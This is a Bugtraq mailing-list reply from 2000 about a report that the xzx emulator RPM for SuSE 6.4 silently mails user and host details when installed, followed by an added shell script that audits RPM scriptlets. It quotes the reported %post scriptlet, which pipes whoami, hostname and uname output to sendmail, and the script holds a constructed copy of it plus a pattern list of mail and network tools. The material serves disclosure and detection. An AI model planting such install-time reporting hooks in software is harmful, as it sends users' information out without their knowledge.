Bugtraq
mailing list archives
Re: Package xzx-2.9.2-2.i386.rpm spies - SuSE Linux 6.4
From: Andreas Jaeger <aj () SUSE DE>
Date: Mon, 24 Jul 2000 20:20:13 +0200
Gunadi, Prana writes:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> System affected:
> =====================
> SuSE Linux 6.4
> Homepage:
> http://www.suse.de/en/produkte/susesoft/linux/Pakete/paket_xzx.html
> Package name:
> =====================
> xzx-2.9.2-2.i386.rpm
> XZX is a portable emulator of ZX Spectrum 48K/128K/+3
> Problem:
> =====================
> This program tries to send an unauthorized e-mail during its RPM
> installation (PRIVACY problem) to <install () fantasy muc de>
> PROOF:
> =====================
> - From the file /usr/src/RPM/SPECS/xzx.spec (the post installation entry)
That path does not exist under SuSE 6.4, SuSE uses packages instead
of RPM. Are you sure this comes from SuSE 6.4? In that case please
send me the complete (!) spec file, I'd like to check it.
Just for the record: I checked the current spec file for the upcoming
SuSE 7.0 release and my CDs of 6.4 - both don't contain the post
section. I do agree that this shouldn't happen.
Andreas
> == xzx.spec (some snipped) ==
> %post
> set +x
> sm=`type sendmail`
> if [ $? -eq 0 ]
> then
> set ${sm}
> SENDMAIL=$3
> else
> SENDMAIL=/usr/sbin/sendmail
> fi
> if [ -x ${SENDMAIL} ]
> then
> ${SENDMAIL} install () fantasy muc de 2>/dev/null <<- _EOF_
> Subject: install notification
> Version: %{Name}-%{Version}
> Date : `date`
> User : `whoami`
> Host : `hostname`
> OS : `uname -a`
> _EOF_
> fi
> === xzx.spec (some snipped) ===
> Solution:
> Compile from its source instead of installing its RPM package
--
Andreas Jaeger
SuSE Labs aj () suse de
private aj () arthur inka de
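
An added example, not part of the original thread: a shell check that reads the output of `rpm -qp --scripts` and flags scriptlet lines that name a mail or network client or collect host identity, the pattern reported in the %post section above. The function names, the command lists and the sample scriptlet (with a placeholder recipient) are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag RPM scriptlet lines that can send data off the host.
# Real use:  rpm -qp --scripts ./package.rpm | audit_scriptlets
# The command lists below are an assumed starting set, not exhaustive.

audit_scriptlets() {
    # stdin: scriptlet text. stdout: one "section:line:kind:text" per hit.
    # Returns 1 when a command able to transmit data is named, else 0.
    awk '
    /^[a-z]+ scriptlet/ { section = $1; next }  # e.g. "postinstall scriptlet (using /bin/sh):"
    {
        kind = ""
        if ($0 ~ /(^|[^A-Za-z0-9_])(sendmail|mailx?|curl|wget|nc)([^A-Za-z0-9_]|$)/) {
            kind = "SEND"; send++
        } else if ($0 ~ /(^|[^A-Za-z0-9_])(whoami|hostname|uname)([^A-Za-z0-9_]|$)/) {
            kind = "HOSTINFO"
        }
        if (kind != "")
            printf "%s:%d:%s:%s\n", (section ? section : "unknown"), NR, kind, $0
    }
    END { exit (send > 0) }
    '
}

sample_scriptlets() {
    # Constructed input modelled on the quoted %post; recipient is a placeholder.
    cat <<'SAMPLE'
preinstall scriptlet (using /bin/sh):
mkdir -p /var/lib/demo
postinstall scriptlet (using /bin/sh):
SENDMAIL=/usr/sbin/sendmail
if [ -x ${SENDMAIL} ]
then
${SENDMAIL} collector@example.invalid 2>/dev/null <<- _EOF_
Subject: install notification
User : `whoami`
Host : `hostname`
OS : `uname -a`
_EOF_
fi
SAMPLE
}

# Run with --demo to audit the constructed sample.
if [ "${1:-}" = "--demo" ]; then
    sample_scriptlets | audit_scriptlets || echo "review before installing"
fi
```

The match is on command names only, so a mailer invoked through a variable is caught at the line where the variable is assigned, not where it is used.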